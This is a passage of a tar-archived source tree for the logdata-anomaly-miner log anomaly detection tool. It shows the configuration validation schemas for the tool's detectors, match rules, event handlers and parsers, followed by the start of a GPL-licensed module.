'string', 'allowed': ['MatchValueAverageChangeDetector'], 'required': True}, 'timestamp_path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 
'empty': False}, 'required': True}, 'min_bin_elements': {'type': 'integer', 'required': True, 'min': 1}, 'min_bin_time': {'type': 'integer', 'required': True, 'min': 1}, 'debug_mode': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueStreamWriter'], 'required': True}, 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'separator': {'type': 'string', 'required': True}, 'missing_value_string': {'type': 'string', 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathListValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': 
{'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchIdValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'id_path_list': {'type': 'list', 'required': True}, 'min_allowed_time_diff': {'type': 'float', 'required': True, 'min': 0.01}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 
'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ParserCount'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'report_interval': {'type': 'integer', 'min': 1}, 'labels': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'split_reports_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventGenerationMatchAction'], 'required': True}, 'event_type': {'type': 'string', 'required': True}, 'event_message': {'type': 'string', 'required': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AtomFilterMatchAction'], 'required': True}, # this is optional on purpose. If not used, the default atom_filter is used. 
'subhandler_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'stop_when_handled_flag': {'type': 'boolean'}, 'delete_components': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'], 'required': True}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentDelegatedMatchRule'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'rule_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'string'}, 'required': True}, 'default_rule': {'type': 'string', 'nullable': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NegationMatchRule'], 'required': True}, 'sub_rule': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathExistsMatchRule', 'IPv4InRFC1918MatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value': {'type': ['boolean', 'float', 'integer', 'string'], 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 
'string', 'allowed': ['ValueListMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value_list': {'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'upper_limit': {'type': ['integer', 'float'], 'required': True, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StringRegexMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'regex': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'upper_limit': { 'type': ['integer', 'float'], 'required': True, 'min': 0, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'paths': {'type': 'list', 
'schema': {'type': 'string', 'empty': False}, 'required': True}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}, 'required': True}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer', 'min': 0}, 'nullable': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['DebugMatchRule', 'DebugHistoryMatchRule'], 'required': True}, 'debug_mode': {'type': 'boolean'}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationDetector'], 'required': True}, 'parallel_check_count': {'type': 'integer', 'required': True, 'min': 1}, 'record_count_before_event': {'type': 'integer', 'min': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'use_path_match': {'type': 'boolean'}, 'use_value_match': {'type': 'boolean'}, 'min_rule_attributes': {'type': 'integer', 'min': 1}, 'max_rule_attributes': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_rule_attributes', 1]}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationViolationDetector'], 'required': True}, 'ruleset': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'type': {'type': 'string', 'allowed': ['CorrelationRule'], 'required': True}, 'rule_id': {'type': 'string', 
'required': True, 'empty': False}, 'min_time_delta': {'type': 'integer', 'required': True, 'min': 1}, 'max_time_delta': {'type': 'integer', 'required': True, 'min': 1, 'bigger_than_or_equal': ['min_time_delta', None]}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'nullable': True} }, { 'type': {'type': 'string', 'allowed': ['EventClassSelector'], 'required': True}, 'action_id': {'type': 'string', 'required': True, 'empty': False}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimestampsUnsortedDetector'], 'required': True}, 'exit_on_error_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableCorrelationDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'disc_div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_steps_create_new_rules': {'type': 'integer', 'min': 1}, 'num_upd_until_validation': {'type': 'integer', 'min': 1}, 'num_end_learning_phase': {'type': 'integer', 'min': 1}, 'check_cor_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'check_cor_prob_thres': {'type': 'float', 'min': 0.000001}, 'check_cor_num_thres': {'type': 'integer', 'min': 1}, 
'min_values_cors_thres': {'type': 'integer', 'min': 1}, 'new_vals_alarm_thres': {'type': 'float', 'min': 0.000001}, 'num_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist']}, 'alpha_chisquare_test': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'max_dist_rule_distr': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True}, 'intersect_presel_meth': {'type': 'boolean'}, 'percentage_random_cors': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_vals_sim_tresh': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'exclude_due_distr_lower_limit': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_distr_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True}, 'validate_cor_cover_vals_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'validate_cor_distinct_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableTypeDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 
'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS']}, 'gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'sim_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'indicator_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'num_update_unq': {'type': 'integer', 'min': 1}, 'num_s_gof_values': {'type': 'integer', 'min': 1}, 'num_s_gof_bt': {'type': 'integer', 'min': 1}, 'num_d_bt': {'type': 'integer', 'min': 1}, 'num_pause_discrete': {'type': 'integer', 'min': 0}, 'num_pause_others': {'type': 'integer', 'min': 0}, 'test_gof_int': {'type': 'boolean'}, 'num_stop_update': {'type': 'boolean'}, 'silence_output_without_confidence': {'type': 'boolean'}, 'silence_output_except_indicator': {'type': 'boolean'}, 'num_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_update_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_var_type_considered_ind': {'type': 'integer', 'min': 1}, 'num_stat_stop_update': {'type': 'integer', 'min': 1}, 'num_updates_until_var_reduction': {'type': 'integer', 'min': 0}, 'var_reduction_thres': {'type': 'float'}, 'num_skipped_ind_for_weights': {'type': 'integer', 'min': 0}, 'num_ind_for_weights': {'type': 'integer', 'min': 1}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi']}, 'use_empiric_distr': {'type': 'boolean'}, 'range_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax']}, 'range_threshold': {'type': 'float', 'min': 
0.000001}, 'range_limits_factor': {'type': 'float', 'min': 0.000001}, 'num_reinit_range': {'type': 'integer', 'min': 0}, 'dw_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'save_statistics': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathValueTimeIntervalDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'time_period_length': {'type': 'integer', 'min': 1}, 'max_time_diff': {'type': 'integer', 'min': 1}, 'num_reduce_time_list': {'type': 'integer', 'min': 1}, 'allow_missing_values': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'num_init': {'type': 'integer', 'min': 1}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'alpha': 
{'type': 'float', 'min': 0.000001, 'max': 1.0}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TSAArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'waiting_time': {'type': 'integer', 'min': 1}, 'num_sections_waiting_time': {'type': 'integer', 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'acf_pause_interval_percentage': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_auto_pause_interval': {'type': 'boolean'}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1}, 'build_sum_over_values': {'type': 'boolean'}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'num_division_time_step': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'round_time_interval_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 
'min_log_lines_per_time_step': {'type': 'integer', 'min': 1}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MinimalTransitionTimeDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'min': 1}, 'time_output_threshold': {'type': 'integer', 'min': 0}, 'anomaly_threshold': {'type': 'float', 'min': 0, 'max': 1.0}, 'output_logline': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'], 'required': True}, 'suppress': {'type': 'boolean'} } ] } } } EventHandlerValidationSchema.py000066400000000000000000000071511437606560100407760ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'forbidden': [ 'KafkaEventHandler', 'ZmqEventHandler', 'StreamPrinterEventHandler', 'SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'score': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 
'allowed': ['ZmqEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': False}, 'url': {'type': 'string', 'empty': False}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['KafkaEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': True, 'empty': False}, 'cfgfile': {'type': 'string', 'empty': False}, 'options': {'type': 'dict', 'schema': { 'id': {'type': 'string', 'empty': False}, 'type': {'type': ['string', 'list', 'integer']}}}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StreamPrinterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'output_file_path': {'type': 'string', 'empty': False} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'instance_name': {'type': 'string', 'default': 'aminer', 'empty': False} } ] } } } 
ParserValidationSchema.py000066400000000000000000000137141437606560100376550ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Parser': { 'required': True, 'type': 'list', 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'empty': False, 'forbidden': [ 'ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', 'DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement', 'JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['ElementValueBranchModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'required': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': {'type': [ 'boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string', 'empty': False}}}, 'required': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalFloatValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': 
{'type': 'string', 'allowed': ['DecimalIntegerValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_format': {'type': 'string', 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'text_locale': {'type': 'string', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1}, 'timestamp_scale': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['MultiLocaleDateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True, 'empty': False}, 'maxlength': 3, 'minlength': 3}}}, 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DelimitedDataModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'delimiter': {'type': 'string', 'required': True, 'empty': False}, 'escape': {'type': 'string'}, 'consume_delimiter': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': 
False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'optional_key_prefix': {'type': 'string'}, 'nullable_key_prefix': {'type': 'string'}, 'allow_all_fields': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'strict': {'type': 'boolean'}, 'ignore_null': {'type': 'boolean'} } ] } } } logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/000077500000000000000000000000001437606560100301645ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/History.py000066400000000000000000000100231437606560100321730ustar00rootroot00000000000000"""This module contains multiple History classes used by the aminer. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General 